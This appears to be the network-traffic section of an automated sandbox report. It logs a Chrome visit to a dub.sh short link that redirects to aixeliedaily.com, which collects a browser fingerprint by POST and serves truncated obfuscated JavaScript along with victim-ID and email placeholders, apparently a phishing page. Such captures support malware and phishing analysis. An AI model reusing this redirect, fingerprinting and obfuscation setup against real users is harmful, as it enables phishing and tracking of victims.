                          Oct 23, 2024 22:58:21.415026903 CEST49678443192.168.2.1620.189.173.10
                          Oct 23, 2024 22:58:21.653939009 CEST4968080192.168.2.16192.229.211.108
                          Oct 23, 2024 22:58:22.261946917 CEST4968080192.168.2.16192.229.211.108
                          Oct 23, 2024 22:58:23.476175070 CEST4968080192.168.2.16192.229.211.108
                          Oct 23, 2024 22:58:25.888089895 CEST4968080192.168.2.16192.229.211.108
                          Oct 23, 2024 22:58:26.220982075 CEST49678443192.168.2.1620.189.173.10
                          Oct 23, 2024 22:58:27.658082008 CEST49673443192.168.2.16204.79.197.203
                          Oct 23, 2024 22:58:30.693093061 CEST4968080192.168.2.16192.229.211.108
                          Oct 23, 2024 22:58:35.821192980 CEST49678443192.168.2.1620.189.173.10
                          Oct 23, 2024 22:58:40.293059111 CEST4968080192.168.2.16192.229.211.108
                          Oct 23, 2024 22:58:51.633137941 CEST49700443192.168.2.1676.76.21.123
                          Oct 23, 2024 22:58:51.633197069 CEST4434970076.76.21.123192.168.2.16
                          Oct 23, 2024 22:58:55.339824915 CEST49718443192.168.2.1620.12.23.50
                          Oct 23, 2024 22:58:55.339860916 CEST4434971820.12.23.50192.168.2.16
                          Oct 23, 2024 22:58:55.339971066 CEST49718443192.168.2.1620.12.23.50
                          Oct 23, 2024 22:58:55.340425014 CEST49718443192.168.2.1620.12.23.50
                          Oct 23, 2024 22:58:55.340436935 CEST4434971820.12.23.50192.168.2.16
                          Oct 23, 2024 22:58:56.192559004 CEST4434971820.12.23.50192.168.2.16
                          Oct 23, 2024 22:58:56.192684889 CEST49718443192.168.2.1620.12.23.50
                          Oct 23, 2024 22:58:56.194506884 CEST49718443192.168.2.1620.12.23.50
                          Oct 23, 2024 22:58:56.194535971 CEST4434971820.12.23.50192.168.2.16
                          Oct 23, 2024 22:58:56.194977045 CEST4434971820.12.23.50192.168.2.16
                          Oct 23, 2024 22:58:56.196525097 CEST49718443192.168.2.1620.12.23.50
                          Oct 23, 2024 22:58:56.239339113 CEST4434971820.12.23.50192.168.2.16
                          Oct 23, 2024 22:58:56.476722002 CEST4434971820.12.23.50192.168.2.16
                          Oct 23, 2024 22:58:56.476782084 CEST4434971820.12.23.50192.168.2.16
                          Oct 23, 2024 22:58:56.476824999 CEST4434971820.12.23.50192.168.2.16
                          Oct 23, 2024 22:58:56.476953030 CEST49718443192.168.2.1620.12.23.50
                          Oct 23, 2024 22:58:56.477006912 CEST4434971820.12.23.50192.168.2.16
                          Oct 23, 2024 22:58:56.477145910 CEST49718443192.168.2.1620.12.23.50
                          Oct 23, 2024 22:58:56.591942072 CEST4434971820.12.23.50192.168.2.16
                          Oct 23, 2024 22:58:56.592011929 CEST4434971820.12.23.50192.168.2.16
                          Oct 23, 2024 22:58:56.592057943 CEST49718443192.168.2.1620.12.23.50
                          Oct 23, 2024 22:58:56.592082024 CEST4434971820.12.23.50192.168.2.16
                          Oct 23, 2024 22:58:56.592101097 CEST4434971820.12.23.50192.168.2.16
                          Oct 23, 2024 22:58:56.592118979 CEST49718443192.168.2.1620.12.23.50
                          Oct 23, 2024 22:58:56.592156887 CEST49718443192.168.2.1620.12.23.50
                          Oct 23, 2024 22:58:56.592318058 CEST49718443192.168.2.1620.12.23.50
                          Oct 23, 2024 22:58:56.592331886 CEST4434971820.12.23.50192.168.2.16
                          Oct 23, 2024 22:58:56.592360973 CEST49718443192.168.2.1620.12.23.50
                          Oct 23, 2024 22:58:56.592366934 CEST4434971820.12.23.50192.168.2.16
                          Oct 23, 2024 22:59:07.262109041 CEST49700443192.168.2.1676.76.21.123
                          Oct 23, 2024 22:59:07.262326002 CEST4434970076.76.21.123192.168.2.16
                          Oct 23, 2024 22:59:07.262422085 CEST49700443192.168.2.1676.76.21.123
                          Oct 23, 2024 22:59:09.896672964 CEST49720443192.168.2.16142.250.186.68
                          Oct 23, 2024 22:59:09.896759033 CEST44349720142.250.186.68192.168.2.16
                          Oct 23, 2024 22:59:09.896979094 CEST49720443192.168.2.16142.250.186.68
                          Oct 23, 2024 22:59:09.897319078 CEST49720443192.168.2.16142.250.186.68
                          Oct 23, 2024 22:59:09.897365093 CEST44349720142.250.186.68192.168.2.16
                          Oct 23, 2024 22:59:10.958220005 CEST44349720142.250.186.68192.168.2.16
                          Oct 23, 2024 22:59:10.958657026 CEST49720443192.168.2.16142.250.186.68
                          Oct 23, 2024 22:59:10.958715916 CEST44349720142.250.186.68192.168.2.16
                          Oct 23, 2024 22:59:10.959213972 CEST44349720142.250.186.68192.168.2.16
                          Oct 23, 2024 22:59:10.959640026 CEST49720443192.168.2.16142.250.186.68
                          Oct 23, 2024 22:59:10.959743023 CEST44349720142.250.186.68192.168.2.16
                          Oct 23, 2024 22:59:11.014256954 CEST49720443192.168.2.16142.250.186.68
                          Oct 23, 2024 22:59:20.965156078 CEST44349720142.250.186.68192.168.2.16
                          Oct 23, 2024 22:59:20.965286016 CEST44349720142.250.186.68192.168.2.16
                          Oct 23, 2024 22:59:20.965572119 CEST49720443192.168.2.16142.250.186.68
                          Oct 23, 2024 22:59:21.258522034 CEST49720443192.168.2.16142.250.186.68
                          Oct 23, 2024 22:59:21.258593082 CEST44349720142.250.186.68192.168.2.16
                          Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                          Oct 23, 2024 22:58:05.912796974 CEST | 192.168.2.16 | 1.1.1.1 | 0xf85b | Standard query (0) | dub.sh | A (IP address) | IN (0x0001) | false
                          Oct 23, 2024 22:58:05.913094044 CEST | 192.168.2.16 | 1.1.1.1 | 0xa0f9 | Standard query (0) | dub.sh | 65 | IN (0x0001) | false
                          Oct 23, 2024 22:58:06.797046900 CEST | 192.168.2.16 | 1.1.1.1 | 0x8b00 | Standard query (0) | aixeliedaily.com | A (IP address) | IN (0x0001) | false
                          Oct 23, 2024 22:58:06.797365904 CEST | 192.168.2.16 | 1.1.1.1 | 0x400d | Standard query (0) | aixeliedaily.com | 65 | IN (0x0001) | false
                          Oct 23, 2024 22:58:09.834049940 CEST | 192.168.2.16 | 1.1.1.1 | 0x1633 | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false
                          Oct 23, 2024 22:58:09.834203005 CEST | 192.168.2.16 | 1.1.1.1 | 0x317 | Standard query (0) | www.google.com | 65 | IN (0x0001) | false
                          Oct 23, 2024 22:58:09.997935057 CEST | 192.168.2.16 | 1.1.1.1 | 0xb48d | Standard query (0) | cdn.socket.io | A (IP address) | IN (0x0001) | false
                          Oct 23, 2024 22:58:09.998111010 CEST | 192.168.2.16 | 1.1.1.1 | 0x1d75 | Standard query (0) | cdn.socket.io | 65 | IN (0x0001) | false
                          Oct 23, 2024 22:58:11.490041018 CEST | 192.168.2.16 | 1.1.1.1 | 0xd116 | Standard query (0) | cdn.socket.io | A (IP address) | IN (0x0001) | false
                          Oct 23, 2024 22:58:11.490454912 CEST | 192.168.2.16 | 1.1.1.1 | 0xe40 | Standard query (0) | cdn.socket.io | 65 | IN (0x0001) | false
                          Oct 23, 2024 22:58:12.568725109 CEST | 192.168.2.16 | 1.1.1.1 | 0xc3c6 | Standard query (0) | aixeliedaily.com | A (IP address) | IN (0x0001) | false
                          Oct 23, 2024 22:58:12.568902969 CEST | 192.168.2.16 | 1.1.1.1 | 0x1570 | Standard query (0) | aixeliedaily.com | 65 | IN (0x0001) | false
                          Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                          Oct 23, 2024 22:58:05.931155920 CEST | 1.1.1.1 | 192.168.2.16 | 0xf85b | No error (0) | dub.sh |  | 76.76.21.123 | A (IP address) | IN (0x0001) | false
                          Oct 23, 2024 22:58:05.931155920 CEST | 1.1.1.1 | 192.168.2.16 | 0xf85b | No error (0) | dub.sh |  | 76.76.21.93 | A (IP address) | IN (0x0001) | false
                          Oct 23, 2024 22:58:07.077424049 CEST | 1.1.1.1 | 192.168.2.16 | 0x8b00 | No error (0) | aixeliedaily.com |  | 192.254.233.44 | A (IP address) | IN (0x0001) | false
                          Oct 23, 2024 22:58:09.841551065 CEST | 1.1.1.1 | 192.168.2.16 | 0x317 | No error (0) | www.google.com |  |  | 65 | IN (0x0001) | false
                          Oct 23, 2024 22:58:09.841928005 CEST | 1.1.1.1 | 192.168.2.16 | 0x1633 | No error (0) | www.google.com |  | 142.250.186.68 | A (IP address) | IN (0x0001) | false
                          Oct 23, 2024 22:58:10.006463051 CEST | 1.1.1.1 | 192.168.2.16 | 0xb48d | No error (0) | cdn.socket.io | d2vgu95hoyrpkh.cloudfront.net |  | CNAME (Canonical name) | IN (0x0001) | false
                          Oct 23, 2024 22:58:10.006463051 CEST | 1.1.1.1 | 192.168.2.16 | 0xb48d | No error (0) | d2vgu95hoyrpkh.cloudfront.net |  | 18.245.31.33 | A (IP address) | IN (0x0001) | false
                          Oct 23, 2024 22:58:10.006463051 CEST | 1.1.1.1 | 192.168.2.16 | 0xb48d | No error (0) | d2vgu95hoyrpkh.cloudfront.net |  | 18.245.31.89 | A (IP address) | IN (0x0001) | false
                          Oct 23, 2024 22:58:10.006463051 CEST | 1.1.1.1 | 192.168.2.16 | 0xb48d | No error (0) | d2vgu95hoyrpkh.cloudfront.net |  | 18.245.31.5 | A (IP address) | IN (0x0001) | false
                          Oct 23, 2024 22:58:10.006463051 CEST | 1.1.1.1 | 192.168.2.16 | 0xb48d | No error (0) | d2vgu95hoyrpkh.cloudfront.net |  | 18.245.31.78 | A (IP address) | IN (0x0001) | false
                          Oct 23, 2024 22:58:10.007034063 CEST | 1.1.1.1 | 192.168.2.16 | 0x1d75 | No error (0) | cdn.socket.io | d2vgu95hoyrpkh.cloudfront.net |  | CNAME (Canonical name) | IN (0x0001) | false
                          Oct 23, 2024 22:58:11.499572992 CEST | 1.1.1.1 | 192.168.2.16 | 0xe40 | No error (0) | cdn.socket.io | d2vgu95hoyrpkh.cloudfront.net |  | CNAME (Canonical name) | IN (0x0001) | false
                          Oct 23, 2024 22:58:11.502469063 CEST | 1.1.1.1 | 192.168.2.16 | 0xd116 | No error (0) | cdn.socket.io | d2vgu95hoyrpkh.cloudfront.net |  | CNAME (Canonical name) | IN (0x0001) | false
                          Oct 23, 2024 22:58:11.502469063 CEST | 1.1.1.1 | 192.168.2.16 | 0xd116 | No error (0) | d2vgu95hoyrpkh.cloudfront.net |  | 18.245.31.5 | A (IP address) | IN (0x0001) | false
                          Oct 23, 2024 22:58:11.502469063 CEST | 1.1.1.1 | 192.168.2.16 | 0xd116 | No error (0) | d2vgu95hoyrpkh.cloudfront.net |  | 18.245.31.33 | A (IP address) | IN (0x0001) | false
                          Oct 23, 2024 22:58:11.502469063 CEST | 1.1.1.1 | 192.168.2.16 | 0xd116 | No error (0) | d2vgu95hoyrpkh.cloudfront.net |  | 18.245.31.89 | A (IP address) | IN (0x0001) | false
                          Oct 23, 2024 22:58:11.502469063 CEST | 1.1.1.1 | 192.168.2.16 | 0xd116 | No error (0) | d2vgu95hoyrpkh.cloudfront.net |  | 18.245.31.78 | A (IP address) | IN (0x0001) | false
                          Oct 23, 2024 22:58:12.847182989 CEST | 1.1.1.1 | 192.168.2.16 | 0xc3c6 | No error (0) | aixeliedaily.com |  | 192.254.233.44 | A (IP address) | IN (0x0001) | false
                          • dub.sh
                          • aixeliedaily.com
                          • https:
                            • cdn.socket.io
                          • fs.microsoft.com
                          • slscr.update.microsoft.com
                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          0 | 192.168.2.16 | 49699 | 76.76.21.123 | 443 | 6812 | C:\Program Files\Google\Chrome\Application\chrome.exe
                          Timestamp | Bytes transferred | Direction | Data
                          2024-10-23 20:58:06 UTC | 656 | OUT | GET /vu352zF HTTP/1.1
                          Host: dub.sh
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          sec-ch-ua-mobile: ?0
                          sec-ch-ua-platform: "Windows"
                          Upgrade-Insecure-Requests: 1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Sec-Fetch-Site: none
                          Sec-Fetch-Mode: navigate
                          Sec-Fetch-User: ?1
                          Sec-Fetch-Dest: document
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-10-23 20:58:06 UTC | 721 | IN | HTTP/1.1 302 Found
                          Cache-Control: public, max-age=0, must-revalidate
                          Content-Type: text/html
                          Date: Wed, 23 Oct 2024 20:58:06 GMT
                          Location: https://aixeliedaily.com/m/
                          Referrer-Policy: no-referrer-when-downgrade
                          Server: Vercel
                          Set-Cookie: dub_id=IefPeh69CfhNBO6z; Path=/vu352zF; Expires=Wed, 23 Oct 2024 21:58:06 GMT; Max-Age=3600
                          Strict-Transport-Security: max-age=63072000
                          X-Dns-Prefetch-Control: on
                          X-Frame-Options: DENY
                          X-Middleware-Set-Cookie: dub_id=IefPeh69CfhNBO6z; Path=/vu352zF; Expires=Wed, 23 Oct 2024 21:58:06 GMT; Max-Age=3600
                          X-Powered-By: Dub.co - Link management for modern marketing teams
                          X-Vercel-Id: cle1::p5rzn-1729717086645-27465188c434
                          Connection: close
                          Transfer-Encoding: chunked
                          2024-10-23 20:58:06 UTC | 147 | IN | Data Ascii: 8d<!doctype html>... https://vercel.app --><h1>Redirecting (302)</h1>The document has moved<a href="https://aixeliedaily.com/m/">here</a>
                          2024-10-23 20:58:06 UTC | 5 | IN | Data Ascii: 0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          1 | 192.168.2.16 | 49701 | 192.254.233.44 | 443 | 6812 | C:\Program Files\Google\Chrome\Application\chrome.exe
                          Timestamp | Bytes transferred | Direction | Data
                          2024-10-23 20:58:07 UTC | 661 | OUT | GET /m/ HTTP/1.1
                          Host: aixeliedaily.com
                          Connection: keep-alive
                          Upgrade-Insecure-Requests: 1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Sec-Fetch-Site: none
                          Sec-Fetch-Mode: navigate
                          Sec-Fetch-User: ?1
                          Sec-Fetch-Dest: document
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          sec-ch-ua-mobile: ?0
                          sec-ch-ua-platform: "Windows"
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-10-23 20:58:08 UTC | 208 | IN | HTTP/1.1 200 OK
                          Date: Wed, 23 Oct 2024 20:58:07 GMT
                          Server: Apache
                          Upgrade: h2,h2c
                          Connection: Upgrade, close
                          Vary: Accept-Encoding
                          Transfer-Encoding: chunked
                          Content-Type: text/html; charset=UTF-8
                          2024-10-23 20:58:08 UTC | 4726 | IN | Data Ascii: 1269<!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> </head> <body> <noscript>You need to enable JavaScript to run this app.</noscript> <div id="ro


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          2 | 192.168.2.16 | 49704 | 192.254.233.44 | 443 | 6812 | C:\Program Files\Google\Chrome\Application\chrome.exe
                          Timestamp | Bytes transferred | Direction | Data
                          2024-10-23 20:58:08 UTC | 820 | OUT | POST /m/ HTTP/1.1
                          Host: aixeliedaily.com
                          Connection: keep-alive
                          Content-Length: 138444
                          Cache-Control: max-age=0
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          sec-ch-ua-mobile: ?0
                          sec-ch-ua-platform: "Windows"
                          Upgrade-Insecure-Requests: 1
                          Origin: https://aixeliedaily.com
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Sec-Fetch-Site: same-origin
                          Sec-Fetch-Mode: navigate
                          Sec-Fetch-Dest: document
                          Referer: https://aixeliedaily.com/m/
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-10-23 20:58:08 UTC | 16384 | OUT | Data Ascii: data=%7B%22screen%22%3A%7B%22availWidth%22%3A1280%2C%22availHeight%22%3A984%2C%22width%22%3A1280%2C%22height%22%3A1024%2C%22colorDepth%22%3A24%2C%22pixelDepth%22%3A24%2C%22availLeft%22%3A0%2C%22availTop%22%3A0%2C%22orientation%22%3A%22%5Bobject+ScreenOrie
                          2024-10-23 20:58:09 UTC | 208 | IN | HTTP/1.1 200 OK
                          Date: Wed, 23 Oct 2024 20:58:09 GMT
                          Server: Apache
                          Upgrade: h2,h2c
                          Connection: Upgrade, close
                          Vary: Accept-Encoding
                          Transfer-Encoding: chunked
                          Content-Type: text/html; charset=UTF-8
                          2024-10-23 20:58:09 UTC | 351 | IN | Data Ascii: 153<!DOCTYPE html><html id='html' sti='UIDXXX' vic='EMAILXXX' lang='en'><head> <script src='https://cdn.socket.io/4.7.5/socket.io.min.js' integrity='sha384-2huaZvOR9iDzHqslqwpR87isEmrfxqyWOF7hr7BY6KG0+hVKLoEXMPUJw3ynWuhO' crossorigin='anonymous'


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          3 | 192.168.2.16 | 49703 | 192.254.233.44 | 443 | 6812 | C:\Program Files\Google\Chrome\Application\chrome.exe
                          Timestamp | Bytes transferred | Direction | Data
                          2024-10-23 20:58:09 UTC | 528 | OUT | GET /m/TYPEXXX HTTP/1.1
                          Host: aixeliedaily.com
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          sec-ch-ua-mobile: ?0
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          sec-ch-ua-platform: "Windows"
                          Accept: */*
                          Sec-Fetch-Site: same-origin
                          Sec-Fetch-Mode: no-cors
                          Sec-Fetch-Dest: script
                          Referer: https://aixeliedaily.com/m/
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-10-23 20:58:10 UTC | 387 | IN | HTTP/1.1 404 Not Found
                          Date: Wed, 23 Oct 2024 20:58:10 GMT
                          Server: Apache
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Link: <https://aixeliedaily.com/index.php/wp-json/>; rel="https://api.w.org/"
                          Upgrade: h2,h2c
                          Connection: Upgrade, close
                          Vary: Accept-Encoding
                          Transfer-Encoding: chunked
                          Content-Type: text/html; charset=UTF-8
                          2024-10-23 20:58:10 UTC | 7805 | IN | Data Ascii: 4000<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){con


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          4 | 192.168.2.16 | 49706 | 18.245.31.33 | 443 | 6812 | C:\Program Files\Google\Chrome\Application\chrome.exe
                          Timestamp | Bytes transferred | Direction | Data
                          2024-10-23 20:58:10 UTC | 566 | OUT | GET /4.7.5/socket.io.min.js HTTP/1.1
                          Host: cdn.socket.io
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          Origin: https://aixeliedaily.com
                          sec-ch-ua-mobile: ?0
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          sec-ch-ua-platform: "Windows"
                          Accept: */*
                          Sec-Fetch-Site: cross-site
                          Sec-Fetch-Mode: cors
                          Sec-Fetch-Dest: script
                          Referer: https://aixeliedaily.com/
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-10-23 20:58:11 UTC | 702 | IN | HTTP/1.1 200 OK
                          Content-Type: application/javascript; charset=utf-8
                          Content-Length: 49993
                          Connection: close
                          Accept-Ranges: bytes
                          Access-Control-Allow-Origin: *
                          Cache-Control: public, max-age=31536000, immutable
                          Content-Disposition: inline; filename="socket.io.min.js"
                          Date: Sat, 03 Aug 2024 07:26:50 GMT
                          ETag: "777eb8fd4f8320b6e5cc9a7159bdec6a"
                          Server: Vercel
                          Strict-Transport-Security: max-age=63072000
                          X-Vercel-Cache: HIT
                          X-Vercel-Id: fra1::4xmtd-1722670010047-e30d468233ba
                          X-Cache: Hit from cloudfront
                          Via: 1.1 5dbbe1c6db9a003131a63be8ded250a4.cloudfront.net (CloudFront)
                          X-Amz-Cf-Pop: FRA56-P8
                          X-Amz-Cf-Id: I4rnUGAQGyhlnRZTGB63tMp8kBwm9rIWCjyEw699X0AH7yEmoW5hog==
                          Age: 7424482
                          2024-10-23 20:58:11 UTC | 16384 | IN | Data Ascii: /*! * Socket.IO v4.7.5 * (c) 2014-2024 Guillermo Rauch * Released under the MIT License. */!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(e="undefined"!=typeof g


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          5 | 192.168.2.16 | 49710 | 192.254.233.44 | 443 | 6812 | C:\Program Files\Google\Chrome\Application\chrome.exe
                          Timestamp | Bytes transferred | Direction | Data
                          2024-10-23 20:58:12 UTC | 590 | OUT | GET /favicon.ico HTTP/1.1
                          Host: aixeliedaily.com
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          sec-ch-ua-mobile: ?0
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          sec-ch-ua-platform: "Windows"
                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                          Sec-Fetch-Site: same-origin
                          Sec-Fetch-Mode: no-cors
                          Sec-Fetch-Dest: image
                          Referer: https://aixeliedaily.com/m/
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-10-23 20:58:12 UTC | 208 | IN | HTTP/1.1 200 OK
                          Date: Wed, 23 Oct 2024 20:58:12 GMT
                          Server: Apache
                          Upgrade: h2,h2c
                          Connection: Upgrade, close
                          Vary: Accept-Encoding
                          Transfer-Encoding: chunked
                          Content-Type: image/vnd.microsoft.icon
                          2024-10-23 20:58:12 UTC | 7235 | IN | Data Ascii: 1c36<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){con


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          6 | 192.168.2.16 | 49711 | 18.245.31.5 | 443 | 6812 | C:\Program Files\Google\Chrome\Application\chrome.exe
                          Timestamp | Bytes transferred | Direction | Data
                          2024-10-23 20:58:12 UTC | 359 | OUT | GET /4.7.5/socket.io.min.js HTTP/1.1
                          Host: cdn.socket.io
                          Connection: keep-alive
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          Accept: */*
                          Sec-Fetch-Site: none
                          Sec-Fetch-Mode: cors
                          Sec-Fetch-Dest: empty
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-10-23 20:58:12 UTC | 702 | IN | HTTP/1.1 200 OK
                          Content-Type: application/javascript; charset=utf-8
                          Content-Length: 49993
                          Connection: close
                          Accept-Ranges: bytes
                          Access-Control-Allow-Origin: *
                          Cache-Control: public, max-age=31536000, immutable
                          Content-Disposition: inline; filename="socket.io.min.js"
                          Date: Sat, 03 Aug 2024 07:26:50 GMT
                          ETag: "777eb8fd4f8320b6e5cc9a7159bdec6a"
                          Server: Vercel
                          Strict-Transport-Security: max-age=63072000
                          X-Vercel-Cache: HIT
                          X-Vercel-Id: fra1::4xmtd-1722670010047-e30d468233ba
                          X-Cache: Hit from cloudfront
                          Via: 1.1 1feab8d6a8e5cc920c359b62fd33d3de.cloudfront.net (CloudFront)
                          X-Amz-Cf-Pop: FRA56-P8
                          X-Amz-Cf-Id: BPDrSZNC1veDOO7MKmTVYs8Tw_P1adsEt3JCW47E-eChtqBMiNtuxg==
                          Age: 7424483


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          7 | 192.168.2.16 | 49714 | 192.254.233.44 | 443 | 6812 | C:\Program Files\Google\Chrome\Application\chrome.exe
                          Timestamp | Bytes transferred | Direction | Data
                          2024-10-23 20:58:13 UTC | 351 | OUT | GET /favicon.ico HTTP/1.1
                          Host: aixeliedaily.com
                          Connection: keep-alive
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          Accept: */*
                          Sec-Fetch-Site: none
                          Sec-Fetch-Mode: cors
                          Sec-Fetch-Dest: empty
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-10-23 20:58:13 UTC | 208 | IN | HTTP/1.1 200 OK
                          Date: Wed, 23 Oct 2024 20:58:13 GMT
                          Server: Apache
                          Upgrade: h2,h2c
                          Connection: Upgrade, close
                          Vary: Accept-Encoding
                          Transfer-Encoding: chunked
                          Content-Type: image/vnd.microsoft.icon
                          2024-10-23 20:58:13 UTC | 7235 | IN | Data Ascii: 1c36<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){con


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          8 | 192.168.2.16 | 49715 | 184.28.90.27 | 443
                          Timestamp | Bytes transferred | Direction | Data
                          2024-10-23 20:58:15 UTC | 161 | OUT | HEAD /fs/windows/config.json HTTP/1.1
                          Connection: Keep-Alive
                          Accept: */*
                          Accept-Encoding: identity
                          User-Agent: Microsoft BITS/7.8
                          Host: fs.microsoft.com
                          2024-10-23 20:58:16 UTC | 466 | IN | HTTP/1.1 200 OK
                          Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                          Content-Type: application/octet-stream
                          ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                          Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                          Server: ECAcc (lpl/EF06)
                          X-CID: 11
                          X-Ms-ApiVersion: Distribute 1.2
                          X-Ms-Region: prod-neu-z1
                          Cache-Control: public, max-age=71276
                          Date: Wed, 23 Oct 2024 20:58:16 GMT
                          Connection: close
                          X-CID: 2


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          9 | 192.168.2.16 | 49716 | 184.28.90.27 | 443
                          Timestamp | Bytes transferred | Direction | Data
                          2024-10-23 20:58:17 UTC | 239 | OUT | GET /fs/windows/config.json HTTP/1.1
                          Connection: Keep-Alive
                          Accept: */*
                          Accept-Encoding: identity
                          If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                          Range: bytes=0-2147483646
                          User-Agent: Microsoft BITS/7.8
                          Host: fs.microsoft.com
                          2024-10-23 20:58:17 UTC | 514 | IN | HTTP/1.1 200 OK
                          ApiVersion: Distribute 1.1
                          Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                          Content-Type: application/octet-stream
                          ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                          Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                          Server: ECAcc (lpl/EF06)
                          X-CID: 11
                          X-Ms-ApiVersion: Distribute 1.2
                          X-Ms-Region: prod-weu-z1
                          Cache-Control: public, max-age=71244
                          Date: Wed, 23 Oct 2024 20:58:17 GMT
                          Content-Length: 55
                          Connection: close
                          X-CID: 2
                          2024-10-23 20:58:17 UTC | 55 | IN | Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          10 | 192.168.2.16 | 49717 | 20.12.23.50 | 443
                          Timestamp | Bytes transferred | Direction | Data
                          2024-10-23 20:58:18 UTC | 306 | OUT | GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=5Ph5S4BCaUnUfHa&MD=vlcclxBN HTTP/1.1
                          Connection: Keep-Alive
                          Accept: */*
